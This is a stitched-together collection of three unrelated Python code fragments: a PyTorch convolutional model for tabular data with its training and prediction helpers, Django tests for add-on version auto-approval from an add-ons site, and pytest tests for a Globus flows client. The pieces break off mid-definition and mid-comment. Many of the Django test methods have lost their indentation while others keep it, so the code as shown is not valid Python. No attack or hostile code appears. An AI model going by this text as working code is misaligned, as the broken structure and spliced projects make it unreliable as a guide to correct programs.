        # Derived sizes: sequence length after the reshape and each pooling.
        cha_1_reshape = int(hidden_size / channel_1)
        cha_po_1 = int(hidden_size / channel_1 / 2)
        cha_po_2 = int(hidden_size / channel_1 / 2 / 2) * channel_3
        self.cat_dim = emb_dim * len(n_categories)
        self.cha_1 = channel_1
        self.cha_2 = channel_2
        self.cha_3 = channel_3
        self.cha_1_reshape = cha_1_reshape
        self.cha_po_1 = cha_po_1
        self.cha_po_2 = cha_po_2
        self.two_stage = two_stage
        self.expand = nn.Sequential(
            nn.BatchNorm1d(num_features + self.cat_dim),
            nn.Dropout(dropout_top),
            nn.utils.weight_norm(nn.Linear(num_features + self.cat_dim, hidden_size), dim=None),
            nn.CELU(0.06) if celu else nn.ReLU()
        )

        def _norm(layer, dim=None):
            # Optionally wrap conv/linear layers in weight normalisation.
            return nn.utils.weight_norm(layer, dim=dim) if weight_norm else layer

        # NOTE: padding = kernel1 // 2 only preserves length for odd kernel1.
        self.conv1 = nn.Sequential(
            nn.BatchNorm1d(channel_1),
            nn.Dropout(dropout_top),
            _norm(nn.Conv1d(channel_1, channel_2, kernel_size=kernel1, stride=1, padding=kernel1 // 2, bias=False)),
            nn.ReLU(),
            nn.AdaptiveAvgPool1d(output_size=cha_po_1),
            nn.BatchNorm1d(channel_2),
            nn.Dropout(dropout_top),
            _norm(nn.Conv1d(channel_2, channel_2, kernel_size=3, stride=1, padding=1, bias=True)),
            nn.ReLU()
        )
        if self.two_stage:
            self.conv2 = nn.Sequential(
                nn.BatchNorm1d(channel_2),
                nn.Dropout(dropout_mid),
                _norm(nn.Conv1d(channel_2, channel_2, kernel_size=3, stride=1, padding=1, bias=True)),
                nn.ReLU(),
                nn.BatchNorm1d(channel_2),
                nn.Dropout(dropout_bottom),
                _norm(nn.Conv1d(channel_2, channel_3, kernel_size=5, stride=1, padding=2, bias=True)),
                nn.ReLU()
            )
        self.max_po_c2 = nn.MaxPool1d(kernel_size=4, stride=2, padding=1)
        self.flt = nn.Flatten()
        self.dense = nn.Sequential(
            nn.BatchNorm1d(cha_po_2),
            nn.Dropout(dropout_bottom),
            _norm(nn.Linear(cha_po_2, num_targets), dim=0)
        )
        # Embeddings are created last so earlier layers keep the same
        # RNG-derived initialisation order as before.  (The redundant second
        # assignment of self.cat_dim that used to live here was removed.)
        self.embs = nn.ModuleList([nn.Embedding(x, emb_dim) for x in n_categories])
        self.dropout_cat = nn.Dropout(dropout_cat)

    def forward(self, x_num, x_cat):
        """x_num: (batch, num_features) floats; x_cat: (batch, n_cat) ids."""
        embs = [embedding(x_cat[:, i]) for i, embedding in enumerate(self.embs)]
        x_cat_emb = self.dropout_cat(torch.cat(embs, 1))
        x = torch.cat([x_num, x_cat_emb], 1)
        x = self.expand(x)
        # (batch, hidden_size) -> (batch, channel_1, hidden_size / channel_1)
        x = x.reshape(x.shape[0], self.cha_1, self.cha_1_reshape)
        x = self.conv1(x)
        if self.two_stage:
            # Gated combination: second stage modulates the first.
            x = self.conv2(x) * x
        x = self.max_po_c2(x)
        x = self.flt(x)
        x = self.dense(x)
        return x
def train_epoch_2(data_loader: DataLoader,
                  model: nn.Module,
                  optimizer,
                  scheduler,
                  device,
                  clip_grad: float = 1.5,
                  loss_func=None):
    """Run one training epoch and return the average loss.

    ``scheduler`` (if given) is stepped once per batch.  Gradients are
    clipped to ``clip_grad`` (L2 norm) before each optimizer step.
    """
    model.train()
    losses = AverageMeter()
    if loss_func is None:
        loss_func = nn.L1Loss()  # MAE matches the evaluation metric
    for x_num, x_cat, y in tqdm(data_loader, position=0, leave=True, desc='Training'):
        batch_size = x_num.size(0)
        x_num = x_num.to(device, dtype=torch.float)
        x_cat = x_cat.to(device)
        y = y.to(device, dtype=torch.float)
        loss = loss_func(model(x_num, x_cat), y)
        # Weight by batch size so the epoch average is per-sample.
        losses.update(loss.detach().cpu().numpy(), batch_size)
        loss.backward()
        torch.nn.utils.clip_grad_norm_(model.parameters(), clip_grad)
        optimizer.step()
        optimizer.zero_grad()
        if scheduler is not None:
            scheduler.step()
    # The unused per-batch `step` counter from the original was removed.
    return losses.avg
def evaluate_2(data_loader: DataLoader, model, device):
    """Evaluate ``model`` on ``data_loader``.

    Returns ``(outputs, targets, avg_loss, mae, per_target_maes)``; the MAE
    entries are None when they cannot be computed (e.g. NaNs in outputs).
    """
    model.eval()
    losses = AverageMeter()
    final_targets = []
    final_outputs = []
    with torch.no_grad():
        for x_num, x_cat, y in tqdm(data_loader, position=0, leave=True, desc='Evaluating'):
            batch_size = x_num.size(0)
            x_num = x_num.to(device, dtype=torch.float)
            x_cat = x_cat.to(device)
            y = y.to(device, dtype=torch.float)
            # Already inside no_grad; the original nested context was redundant.
            output = model(x_num, x_cat)
            loss = nn.L1Loss()(output, y)
            # record loss
            losses.update(loss.detach().cpu().numpy(), batch_size)
            targets = y.detach().cpu().numpy()
            output = output.detach().cpu().numpy()
            final_targets.append(targets)
            final_outputs.append(output)
    final_targets = np.concatenate(final_targets)
    final_outputs = np.concatenate(final_outputs)
    try:
        mae = mean_absolute_error(final_targets, final_outputs)
        maes = [mean_absolute_error(final_targets[:, i], final_outputs[:, i]) for i in range(4)]
    except Exception:
        # Narrowed from a bare except: never swallow SystemExit/KeyboardInterrupt.
        mae = None
        maes = None
    return final_outputs, final_targets, losses.avg, mae, maes
def preprocess_nn_2(
        X: pd.DataFrame,
        scaler: Optional[StandardScaler] = None,
        scaler_type: str = 'standard'):
    """Split ``X`` into scaled numeric and integer categorical arrays.

    NOTE: mutates ``X`` in place by appending ``<col>_isnull`` indicator
    columns — callers pass a copy (see ``predict_nn``).

    When ``scaler`` is None a new scaler is fitted and returned, giving
    ``(X_num, X_cat, cat_cols, scaler)``.  Otherwise the supplied scaler is
    applied and the result is ``(X_num, X_cat, cat_cols)``.

    Raises ValueError for an unknown ``scaler_type``.
    """
    for c in X.columns:
        X[f"{c}_isnull"] = X[c].isnull().astype(int)
    cat_cols = [c for c in X.columns if c in CATEGORICAL_COLS.keys()]
    num_cols = [c for c in X.columns if c not in cat_cols]
    X_num = X[num_cols].values.astype(np.float32)
    X_cat = np.nan_to_num(X[cat_cols].values.astype(np.int32))
    if scaler is None:
        if scaler_type == 'standard':
            scaler = StandardScaler()
        elif scaler_type == 'gauss':
            scaler = QuantileTransformer(output_distribution="normal", n_quantiles=5000)
        else:
            # Fail fast instead of the AttributeError the old code produced
            # when fit_transform was called on a still-None scaler.
            raise ValueError(f"Unknown scaler_type: {scaler_type!r}")
        X_num = scaler.fit_transform(X_num)
        X_num = np.nan_to_num(X_num)
        return X_num, X_cat, cat_cols, scaler
    else:
        X_num = scaler.transform(X_num)
        X_num = np.nan_to_num(X_num)
        return X_num, X_cat, cat_cols
def predict_nn(X: pd.DataFrame,
               model: Union[List[MLP], MLP],
               scaler: StandardScaler,
               device):
    """Predict with one model or an ensemble (mean over member outputs).

    Returns an ``(n_rows, 4)`` numpy array of predictions.
    """
    if not isinstance(model, list):
        model = [model]
    for m in model:
        m.eval()
    # Copy so preprocess_nn_2's in-place column additions don't leak out.
    X_num, X_cat, cat_cols = preprocess_nn_2(X.copy(), scaler)
    valid_dataset = TabularDataset(X_num, X_cat, None)
    valid_loader = torch.utils.data.DataLoader(valid_dataset,
                                               batch_size=512,
                                               shuffle=False,
                                               num_workers=4)
    final_outputs = []
    with torch.no_grad():
        for x_num, x_cat in tqdm(valid_loader, position=0, leave=True, desc='Evaluating'):
            x_num = x_num.to(device, dtype=torch.float)
            x_cat = x_cat.to(device)
            outputs = []
            # Already inside no_grad; the redundant nested context was removed.
            for m in model:
                output = m(x_num, x_cat)
                outputs.append(output.detach().cpu().numpy())
            final_outputs.append(np.array(outputs).mean(axis=0))
    final_outputs = np.concatenate(final_outputs)
    return final_outputs
def train_nn(X: pd.DataFrame,
Ys: pd.DataFrame,
cv: TimeSeriesSplit,
df_train: pd.DataFrame,
pkl_path: str,
| |
addon=addon, version='0.2', file_kw={'status': amo.STATUS_DISABLED}
)
assert list(Version.objects.valid()) == [additional_version, self.version]
    def test_unlisted_addon_get_url_path(self):
        """A version of an unlisted add-on has no public URL path."""
        self.make_addon_unlisted(self.version.addon)
        self.version.reload()
        assert self.version.get_url_path() == ''
def test_source_upload_path(self):
addon = Addon.objects.get(id=3615)
version = version_factory(addon=addon, version='0.1')
uploaded_name = source_upload_path(version, 'foo.tar.gz')
assert uploaded_name.endswith('a3615-0.1-src.tar.gz')
def test_source_upload_path_utf8_chars(self):
addon = Addon.objects.get(id=3615)
addon.update(slug='crosswarpex-확장')
version = version_factory(addon=addon, version='0.1')
uploaded_name = source_upload_path(version, 'crosswarpex-확장.tar.gz')
assert uploaded_name.endswith('crosswarpex-확장-0.1-src.tar.gz')
    def test_status_handles_invalid_status_id(self):
        """version.status falls back to a placeholder for unknown file status ids."""
        version = Addon.objects.get(id=3615).current_version
        # When the status is a valid one, STATUS_CHOICES_FILE provides the label.
        assert version.status == [amo.STATUS_CHOICES_FILE[version.all_files[0].status]]
        version.all_files[0].update(status=99)  # 99 isn't a valid status.
        # Otherwise the raw status code is returned for reference.
        assert version.status == ['[status:99]']
def test_is_ready_for_auto_approval(self):
addon = Addon.objects.get(id=3615)
version = addon.current_version
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(
status=amo.STATUS_AWAITING_REVIEW, is_webextension=True
)
version.update(channel=amo.RELEASE_CHANNEL_LISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=True)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# With the auto-approval disabled flag set, it's still considered
# "ready", even though the auto_approve code won't approve it.
del version.is_ready_for_auto_approval
AddonReviewerFlags.objects.create(addon=addon, auto_approval_disabled=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_STATICTHEME)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_LPAPP)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_DICT)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test with an unlisted version. Note that it's the only version, so
# the add-on status is reset to STATUS_NULL at this point.
del version.is_ready_for_auto_approval
version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Retest with an unlisted version again and the addon being approved or
# nominated
del version.is_ready_for_auto_approval
addon.reload()
addon.update(status=amo.STATUS_NOMINATED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(status=amo.STATUS_APPROVED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
    def test_is_ready_for_auto_approval_addon_status(self):
        """A disabled add-on is never ready for auto-approval."""
        addon = Addon.objects.get(id=3615)
        # NOTE(review): status is assigned in memory only (not saved) —
        # presumably sufficient because the property reads this instance.
        addon.status = amo.STATUS_NOMINATED
        version = addon.current_version
        version.files.all().update(
            status=amo.STATUS_AWAITING_REVIEW, is_webextension=True
        )
        # Ensure the cached_property has not been set yet
        assert 'is_ready_for_auto_approval' not in version.__dict__
        # Test it.
        assert version.is_ready_for_auto_approval
        # It should now be set
        assert 'is_ready_for_auto_approval' in version.__dict__
        del version.is_ready_for_auto_approval
        addon.update(status=amo.STATUS_DISABLED)
        assert not version.is_ready_for_auto_approval
        # It should now be set
        assert 'is_ready_for_auto_approval' in version.__dict__
def test_transformer_auto_approvable(self):
addon = Addon.objects.get(id=3615)
version = addon.current_version
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(
status=amo.STATUS_AWAITING_REVIEW, is_webextension=True
)
version.update(channel=amo.RELEASE_CHANNEL_LISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=True)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# With the auto-approval disabled flag set, it's still considered
# "ready", even though the auto_approve code won't approve it.
del version.is_ready_for_auto_approval
AddonReviewerFlags.objects.create(addon=addon, auto_approval_disabled=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_STATICTHEME)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_LPAPP)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_DICT)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# Test with an unlisted version. Note that it's the only version, so
# the add-on status is reset to STATUS_NULL at this point.
del version.is_ready_for_auto_approval
version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# Retest with an unlisted version again and the addon being approved or
# nominated
del version.is_ready_for_auto_approval
addon.reload()
addon.update(status=amo.STATUS_NOMINATED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(status=amo.STATUS_APPROVED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
    def test_was_auto_approved(self):
        """was_auto_approved reflects the AutoApprovalSummary verdict and the
        current (public) file status."""
        addon = Addon.objects.get(id=3615)
        version = addon.current_version
        assert not version.was_auto_approved
        AutoApprovalSummary.objects.create(version=version, verdict=amo.AUTO_APPROVED)
        assert version.was_auto_approved
        version.files.update(status=amo.STATUS_AWAITING_REVIEW)
        del version.all_files  # Reset all_files cache.
        assert not version.was_auto_approved
    @mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
    def test_version_field_changes_not_synced_to_basket(
        self, trigger_sync_objects_to_basket_mock
    ):
        """Plain version field edits must not trigger a basket sync."""
        addon = Addon.objects.get(id=3615)
        version = addon.current_version
        version.update(
            approval_notes='Flôp',
            reviewed=self.days_ago(1),
            nomination=self.days_ago(2),
            version='1.42',
        )
        assert trigger_sync_objects_to_basket_mock.call_count == 0
    @mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
    def test_version_promoted_changes_synced_to_basket(
        self, trigger_sync_objects_to_basket_mock
    ):
        """Creating a PromotedApproval syncs the add-on to basket once."""
        addon = Addon.objects.get(id=3615)
        PromotedApproval.objects.create(
            version=addon.current_version,
            group_id=RECOMMENDED.id,
            application_id=amo.FIREFOX.id,
        )
        assert trigger_sync_objects_to_basket_mock.call_count == 1
        trigger_sync_objects_to_basket_mock.assert_called_with(
            'addon', [addon.pk], 'promoted change'
        )
    @mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
    def test_unlisted_version_deleted_synced_to_basket(
        self, trigger_sync_objects_to_basket_mock
    ):
        """Deleting an unlisted version syncs the add-on to basket once."""
        addon = Addon.objects.get(id=3615)
        version = addon.current_version
        version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        # Discard calls recorded during the channel change above.
        trigger_sync_objects_to_basket_mock.reset_mock()
        version.delete()
        assert trigger_sync_objects_to_basket_mock.call_count == 1
        trigger_sync_objects_to_basket_mock.assert_called_with(
            'addon', [addon.pk], 'unlisted version deleted'
        )
    @mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
    def test_version_deleted_not_synced_to_basket(
        self, trigger_sync_objects_to_basket_mock
    ):
        """Deleting a non-current listed version must not sync to basket."""
        addon = Addon.objects.get(id=3615)
        # We need to create a new version, if we delete current_version this
        # would be synced to basket because _current_version would change.
        new_version = version_factory(
            addon=addon, file_kw={'status': amo.STATUS_NOMINATED}
        )
        new_version.delete()
        assert trigger_sync_objects_to_basket_mock.call_count == 0
def test_promoted_can_be_disabled_and_deleted(self):
addon = Addon.objects.get(id=3615)
# A non-promoted addon can have it's versions disabled.
assert addon.current_version.can_be_disabled_and_deleted()
self.make_addon_promoted(addon, RECOMMENDED, approve_version=True)
addon = addon.reload()
assert addon.promoted_group() == RECOMMENDED
# But a promoted one, that's in a prereview group, can't be disabled
assert not addon.current_version.can_be_disabled_and_deleted()
previous_version = addon.current_version
version_factory(addon=addon, promotion_approved=True)
addon = addon.reload()
assert previous_version != addon.current_version
assert addon.current_version.promoted_approvals.filter(
group_id=RECOMMENDED.id
).exists()
assert previous_version.promoted_approvals.filter(
group_id=RECOMMENDED.id
).exists()
# unless the previous version is also approved for the same group
assert addon.current_version.can_be_disabled_and_deleted()
assert previous_version.can_be_disabled_and_deleted()
# double-check by changing the approval of previous version
previous_version.promoted_approvals.update(group_id=LINE.id)
assert not addon.current_version.can_be_disabled_and_deleted()
previous_version.promoted_approvals.update(group_id=RECOMMENDED.id)
# Check the scenario when some of the previous versions are approved
# but not the most recent previous - | |
import json
import os
import pathlib
import urllib.parse
from typing import Any, Dict, Union, cast
from unittest.mock import Mock
import pytest
import yaml
from globus_automate_client import flows_client
# Minimal flow definition that passes validation: a single "Pass" state that
# is both the entry point and a terminal state. Reused throughout the tests.
VALID_FLOW_DEFINITION = {
    "StartAt": "perfect",
    "States": {
        "perfect": {
            "Type": "Pass",
            "End": True,
        },
    },
}
@pytest.fixture
def fc():
    """Yield a FlowsClient and, on teardown, verify that the test left the
    client's authorizer untouched."""
    client = flows_client.FlowsClient("client", flows_client.AccessTokenAuthorizer)
    original_authorizer = client.authorizer
    yield client
    # Runs after the test body: the authorizer must never be replaced.
    assert client.authorizer is original_authorizer
@pytest.mark.parametrize(
    "d, names, stop_names, expected, message",
    (
        # Empty inputs and outputs
        ({}, set(), None, set(), "nothing should be returned"),
        ({}, {"i"}, None, set(), "nothing should be returned"),
        ({}, set(), {"x"}, set(), "nothing should be returned"),
        ({}, {"i"}, {"x"}, set(), "nothing should be returned"),
        ({"i": "1"}, set(), None, set(), "nothing should be returned"),
        ({"i": 123}, {"i"}, None, set(), "nothing should be returned"),
        ({"i": [123]}, {"i"}, None, set(), "nothing should be returned"),
        ({"x": "1"}, {"i"}, None, set(), "nothing should be returned"),
        ({"x": "1"}, set(), {"x"}, set(), "nothing should be returned"),
        #
        # Corner case behavior
        ({"x": "1"}, {"x"}, {"x"}, {"1"}, "failed to find str (corner case)"),
        #
        # Test includes
        ({"i": "1"}, {"i"}, None, {"1"}, "failed to find top-level str"),
        ({"i": {"i": "1"}}, {"i"}, None, {"1"}, "failed to find str in dict"),
        ({"i": ["1"]}, {"i"}, None, {"1"}, "failed to find str in list"),
        ({"i": ["1", "2"]}, {"i"}, None, {"1", "2"}, "failed to find values in list"),
        ({"i": ["1", {"i": "2"}]}, {"i"}, None, {"1", "2"}, "failed to find values"),
        ({"i": [{"i": "1"}]}, {"i"}, None, {"1"}, "failed to find str in list->dict"),
        #
        # Test excludes
        ({"x": {"i": "1"}}, {"i"}, {"x"}, set(), "found str in excluded dict"),
    ),
)
def test_all_vals_for_keys(d, names, stop_names, expected, message):
    """Validate values are found or ignored correctly.

    *names* are keys whose string values are collected (recursing through
    nested dicts and lists); *stop_names* prune entire subtrees. Only str
    leaves are collected -- ints are ignored per the cases above.
    """
    assert flows_client._all_vals_for_keys(names, d, stop_names) == expected, message
def test_validate_flow_definition_valid():
    """Confirm that valid and well-formed schema raise no errors."""
    # validate_flow_definition raises FlowValidationError on failure, so
    # simply reaching the end of this call is the assertion.
    flows_client.validate_flow_definition(VALID_FLOW_DEFINITION)
def test_validate_flow_definition_multiple_validity_errors():
    """Confirm that validity checks can report multiple errors."""
    schema = {
        # "StartAt" is missing
        "States": {
            "bogus": {},
        },
    }
    with pytest.raises(flows_client.FlowValidationError) as raised:
        flows_client.validate_flow_definition(schema)
    # Both the missing "StartAt" and the empty "bogus" state must be
    # reported in a single exception message.
    assert "'StartAt' is a required property" in raised.value.args[0]
    assert "'States.bogus'" in raised.value.args[0]
def test_validate_flow_definition_multiple_ill_formed_errors():
    """Confirm that well-formed checks can report multiple errors."""
    schema = {
        # "undefined" is referenced but never defined; "unreferenced" is
        # defined but never reachable -- both problems must be reported.
        "StartAt": "undefined",
        "States": {
            "unreferenced": {
                "Type": "Pass",
                "End": True,
            },
        },
    }
    with pytest.raises(flows_client.FlowValidationError) as raised:
        flows_client.validate_flow_definition(schema)
    assert "not referenced" in raised.value.args[0]
    assert "not defined" in raised.value.args[0]
# Collect every example input schema (*schema*.json / *schema*.yaml) shipped
# under the repository's examples/ tree; parametrizes the test below.
input_schemas = pathlib.Path(__file__).parent.rglob("../examples/**/*schema.*")
@pytest.mark.parametrize("filename", input_schemas)
def test_validate_input_schema(filename):
    """Confirm that example input schemas all validate correctly.

    Schemas whose filename contains "invalid" are expected to fail
    validation and are marked xfail.
    """
    if "invalid" in filename.name:
        # BUG FIX: the xfail message was an f-string with no placeholder, so
        # the report never said *which* schema was expected to fail.
        pytest.xfail(f"{filename.name} is invalid according to its filename")
    with filename.open() as file:
        if filename.suffix == ".json":
            schema = json.load(file)
        else:  # filename.suffix == ".yaml"
            schema = yaml.safe_load(file)
    # Raises FlowValidationError if the example schema is not valid.
    flows_client.validate_input_schema(schema)
@pytest.mark.parametrize("schema", (None, set()))
def test_validate_input_schema_bad_type(schema):
    """Confirm that a bad input type results in failures."""
    # Neither None nor a set is a JSON-schema mapping; both must raise.
    with pytest.raises(flows_client.FlowValidationError):
        flows_client.validate_input_schema(schema)
def test_validate_input_schema_multiple_failures():
    """Confirm that an invalid schema can report multiple errors."""
    schema = {
        # "bogus" is not a valid JSON-schema type, and "required" must be a
        # list of property names, not a boolean.
        "properties": {
            "trouble": {
                "type": "bogus",
            },
        },
        "required": False,
    }
    with pytest.raises(flows_client.FlowValidationError) as raised:
        flows_client.validate_input_schema(schema)
    # Both independent problems must appear in one exception message.
    assert "'properties.trouble.type' invalid" in raised.value.args[0]
    assert "'required' invalid" in raised.value.args[0]
@pytest.mark.parametrize(
    "value, expected",
    (
        (None, "https://flows.globus.org"),
        ("prod", "https://flows.globus.org"),
        ("bogus", ValueError),
    ),
)
def test_get_flows_base_url_for_environment_known(monkeypatch, value, expected):
    """Verify that env variables and base URL's are associated correctly."""
    # Force os.environ.get to report *value* as the current environment.
    # NOTE(review): the replacement lambda takes exactly one argument, so any
    # os.environ.get(key, default) call inside the client would raise a
    # TypeError -- confirm the client only ever calls get(key).
    monkeypatch.setattr(os.environ, "get", lambda x: value)
    if expected is ValueError:
        with pytest.raises(ValueError):
            flows_client._get_flows_base_url_for_environment()
    else:
        assert flows_client._get_flows_base_url_for_environment() == expected
def test_deploy_flow_data_construction(fc, mocked_responses):
    """Verify the flow JSON data is constructed correctly."""
    mocked_responses.add("POST", "https://flows.api.globus.org/flows")
    # Each supported field gets a unique sentinel value so the captured
    # request body can be compared against this dict wholesale.
    expected: Dict[str, Union[str, Dict[str, Any]]] = {
        "definition": VALID_FLOW_DEFINITION,
        "input_schema": {"Comment": "flow-input-schema"},
        "title": "--title--",
        "subtitle": "--subtitle--",
        "description": "--description--",
        "keywords": "--keywords--",
        "flow_viewers": ["--flow_viewers--"],
        "flow_starters": ["--flow_starters--"],
        "flow_administrators": ["--flow_administrators--"],
        "subscription_id": "--subscription_id--",
    }
    fc.deploy_flow(
        # Arguments that affect the JSON data
        flow_definition=expected["definition"],
        input_schema=expected["input_schema"],
        title=expected["title"],
        subtitle=expected["subtitle"],
        description=expected["description"],
        keywords=expected["keywords"],
        flow_viewers=expected["flow_viewers"],
        flow_starters=expected["flow_starters"],
        flow_administrators=expected["flow_administrators"],
        subscription_id=expected["subscription_id"],
        # Other arguments
        validate_definition=True,
        validate_schema=True,
        dry_run=False,
    )
    # The mocked POST captured the request; its JSON body must match the
    # sentinels exactly (no fields dropped, renamed, or added).
    data = json.loads(mocked_responses.calls[0].request.body)
    assert data == expected
@pytest.mark.parametrize("input_schema, expected", ((None, False), ({}, True)))
def test_deploy_flow_only_exclude_input_schema_if_none(
    fc, mocked_responses, input_schema, expected
):
    """Verify the *input_schema* is not excluded even if it's false-y.

    An empty dict {} must still be sent; only None drops the key.
    """
    mocked_responses.add("POST", "https://flows.api.globus.org/flows")
    fc.deploy_flow(
        # Included arguments
        flow_definition=VALID_FLOW_DEFINITION,
        title="--title--",
        input_schema=input_schema,
        # Excluded arguments
        subtitle="",
        description=None,
        # Other arguments
        validate_definition=False,
        validate_schema=False,
        dry_run=False,
    )
    data = json.loads(mocked_responses.calls[0].request.body)
    # False-y subtitle/description are dropped from a deploy request,
    # while input_schema follows the None-vs-{} rule under test.
    assert "subtitle" not in data
    assert "description" not in data
    assert ("input_schema" in data) is expected
@pytest.mark.parametrize("dry_run, path", ((False, "flows"), (True, "flows/dry-run")))
def test_deploy_flow_dry_run(fc, mocked_responses, dry_run, path):
    """Verify the *dry_run* parameter affects the URL path."""
    expected_url = f"https://flows.api.globus.org/{path}"
    mocked_responses.add("POST", expected_url)
    fc.deploy_flow(
        flow_definition=VALID_FLOW_DEFINITION,
        title="bogus",
        validate_schema=False,
        dry_run=dry_run,
    )
    # The client must have hit the dry-run variant of the endpoint
    # if (and only if) dry_run was requested.
    recorded_request = mocked_responses.calls[0].request
    assert recorded_request.url == expected_url
def test_deploy_flow_aliases(fc, mocked_responses):
    """Verify that viewer/starter/admin aliases are still supported.

    Each canonical argument has two legacy aliases; all three spellings
    must be merged into the canonical list in the request body.
    """
    mocked_responses.add("POST", "https://flows.api.globus.org/flows")
    fc.deploy_flow(
        # Flow viewers and aliases
        flow_viewers=["v1", "v2"],
        visible_to=["v3"],
        viewers=["v4"],
        # Flow starters and aliases
        flow_starters=["s1", "s2"],
        runnable_by=["s3"],
        starters=["s4"],
        # Flow admins and aliases
        flow_administrators=["a1", "a2"],
        administered_by=["a3"],
        administrators=["a4"],
        # Everything below is mandatory but irrelevant to this test.
        flow_definition=VALID_FLOW_DEFINITION,
        title="",
        validate_definition=False,
        validate_schema=False,
    )
    data = json.loads(mocked_responses.calls[0].request.body)
    # Compared as sets: the merge order of aliases is unspecified.
    assert set(data["flow_viewers"]) == {"v1", "v2", "v3", "v4"}
    assert set(data["flow_starters"]) == {"s1", "s2", "s3", "s4"}
